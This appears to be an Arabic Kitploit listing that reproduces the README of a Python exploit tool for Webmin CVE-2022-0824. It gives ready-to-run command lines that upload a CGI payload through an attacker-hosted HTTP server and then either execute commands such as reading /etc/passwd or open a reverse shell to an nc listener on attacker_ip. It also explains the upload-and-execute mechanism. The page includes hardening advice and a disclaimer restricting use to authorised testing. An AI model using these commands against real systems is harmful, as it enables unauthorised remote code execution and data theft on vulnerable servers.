Webmin-CVE-2022-0824-Enhanced-Exploit — استغلال Python لثغرة Webmin CVE-2022-0824 مع دعم الوضع المزدوج: تنفيذ الأوامر مباشرة وصدفة عكسية. يوفر أنواعاً متعددة من الحمولات، وإدارة ذكية للملفات، وتسجيلاً تفصيلياً لتصحيح الأخطاء لاختبارات الأمان المصرح بها. | Kitploit
أدوات / GitHub / nudttan91 / webmin-cve-2022-0824-enhanced-exploit اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.
آخر 7 أيام آخر 30 يومًا
nudttan91/webmin-cve-2022-0824-enhanced-exploit
Webmin-CVE-2022-0824-Enhanced-Exploit استغلال Python لثغرة Webmin CVE-2022-0824 مع دعم الوضع المزدوج: تنفيذ الأوامر مباشرة وصدفة عكسية. يوفر أنواعاً متعددة من الحمولات، وإدارة ذكية للملفات، وتسجيلاً تفصيلياً لتصحيح الأخطاء لاختبارات الأمان المصرح بها.
8 منذ سنة واحدةWebmin-CVE-2022-0824-Enhanced-Exploit
[!IMPORTANT]
أداة استغلال محسّنة لثغرة Webmin CVE-2022-0824 - تدعم وضعي تنفيذ الأوامر والـ Reverse Shell
[!IMPORTANT]
أداة استغلال محسّنة لثغرة Webmin CVE-2022-0824، تدعم وضعي تنفيذ الأوامر المباشر والـ Reverse Shell.
🚀 الميزات
✅ دعم الوضع المزدوج : وضع تنفيذ الأوامر + وضع الـ Reverse Shell
✅ حمولات متعددة : ثلاثة أنواع مختلفة من الـ Payload: Perl وBash وPython
✅ إدارة ذكية للملفات : توليد أسماء ملفات فريدة تلقائيًا لتجنب التعارض
✅ رفع مع الكتابة القسرية : معالجة تلقائية لمشكلة استبدال الملفات الموجودة
✅ طرق رفع متعددة : تنزيل HTTP، رفع مباشر، إنشاء عبر تنفيذ الأوامر
✅ معلومات تصحيح مفصلة : سجلات كاملة لعملية التنفيذ
✅ واجهة سهلة الاستخدام : مخرجات ملونة ومؤشرات حالة واضحة
📋 معلومات الثغرة
معرف CVE : CVE-2022-0824
الإصدارات المتأثرة : Webmin < 1.990
نوع الثغرة : تنفيذ تعليمات برمجية عن بُعد بسبب رفع ملفات عشوائي
تقييم CVSS : 9.8 (حرج)
🛠️ متطلبات التثبيت # Python 3.6+
pip3 install requests urllib3
📖 طريقة الاستخدام
وضع تنفيذ الأوامر (موصى به) # تنفيذ أمر أساسي
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"
# عرض معلومات النظام
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"
# سرد الملفات
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"
# عرض ملف حساس
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"
# معلومات الشبكة
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"
وضع Reverse Shell # 1. تشغيل المستمع
nc -nlvp 9999
# 2. تنفيذ الاستغلال
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999
📝 شرح المعاملات المعامل الوصف مطلوب مثال -t, --targetعنوان URL الخاص بـ Webmin المستهدف ✅ http://192.168.1.100:10000/-c, --credentialبيانات تسجيل الدخول ✅ admin:password-LS, --py3http_serverعنوان خادم HTTP ✅ 192.168.1.50:8080--shellالأمر المراد تنفيذه ❌ "ls -la"-L, --callback_ipعنوان IP للاتصال الراجع في Reverse Shell ❌* 192.168.1.50-P, --callback_portمنفذ الاتصال الراجع في Reverse Shell ❌* 9999
*ملاحظة: مطلوب في وضع Reverse Shell
🎯 أمثلة الاستخدام
مثال 1: جمع معلومات النظام python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"
مثال 2: استكشاف نظام الملفات python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"
مثال 3: عرض إعدادات الشبكة python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"
🔧 آلية العمل
التحقق من تسجيل الدخول : تسجيل الدخول إلى واجهة إدارة Webmin باستخدام البيانات المقدمة
توليد الـ Payload : إنشاء سكريبت CGI المناسب حسب الوضع
رفع الملف : رفع الحمولة عبر ميزة تنزيل HTTP في مدير الملفات
ضبط الصلاحيات : تعيين صلاحية التنفيذ للملف المرفوع
تنفيذ الأوامر : الوصول إلى سكريبت CGI المرفوع لتنفيذ الأوامر أو إنشاء اتصال عكسي
🛡️ توصيات الحماية
قم بتحديث Webmin إلى أحدث إصدار (>= 1.990)
قيّد الوصول الشبكي إلى واجهة إدارة Webmin
استخدم كلمات مرور قوية والمصادقة الثنائية
دقق سجلات النظام بانتظام
انشر جدار حماية لتطبيقات الويب (WAF)
⚠️ إخلاء المسؤولية هذه الأداة مخصصة فقط لاختبارات الأمان المصرح بها والأغراض التعليمية.
🚫 يُحظر استخدامها على أنظمة غير مصرح بها
🚫 يُحظر استخدامها في الهجمات الخبيثة
🚫 يتحمل المستخدم المسؤولية القانونية المقابلة
✅ استخدمها فقط في بيئات حصلت على إذن صريح
✅ استخدمها في أبحاث الأمان والتحقق من الثغرات
📚 التفاصيل التقنية
أنواع الـ Payload
Perl CGI : الحمولة الرئيسية، الأفضل توافقًا
Bash CGI : حمولة احتياطية، مناسبة لأنظمة Linux
Python CGI : حمولة احتياطية، الأكثر ثراءً بالميزات
طرق الرفع
تنزيل HTTP : عبر ميزة التنزيل عن بُعد في مدير ملفات Webmin
رفع مباشر : عبر واجهة رفع الملفات
إنشاء عبر الأوامر : إنشاء الملفات عبر أوامر النظام
استراتيجية تسمية الملفات
تجزئة MD5 لمحتوى الأمر
لاحقة الطابع الزمني
ضمان استخدام اسم ملف مختلف في كل تنفيذ
🔄 سجل التحديثات
v5.0 (2025-08-05)
✨ إضافة وضع تنفيذ الأوامر
🐛 إصلاح مشكلة الكتابة فوق الملفات
🔧 تحسين استراتيجية تسمية الملفات
📈 تعزيز معالجة الأخطاء
v4.0 (بناءً على النسخة الأصلية)
🎯 استنادًا إلى الكود الأصلي لـ faisalfs10x
🔧 تحسين توافق CGI
📝 إضافة سجلات مفصلة
🤝 المساهمة نرحب بتقديم المشكلات (Issues) وطلبات السحب (Pull Requests)!
انسخ (Fork) هذا المشروع
أنشئ فرع ميزة (git checkout -b feature/AmazingFeature)
احفظ التغييرات (git commit -m 'Add some AmazingFeature')
ادفع إلى الفرع (git push origin feature/AmazingFeature)
افتح طلب سحب (Pull Request)
📄 الرخصة هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للتفاصيل
🙏 الشكر والتقدير
📞 التواصل إذا كانت لديك أسئلة أو اقتراحات، يرجى التواصل عبر:
📧 تقديم Issue على GitHub
🐛 للإبلاغ عن مشكلات أمنية يرجى إرسال رسالة خاصة
⭐ إذا كان هذا المشروع مفيدًا لك، يرجى دعمه بنجمة (Star)!
🔗 روابط ذات صلة
requirements.txt requests>=2.25.1
urllib3>=1.26.0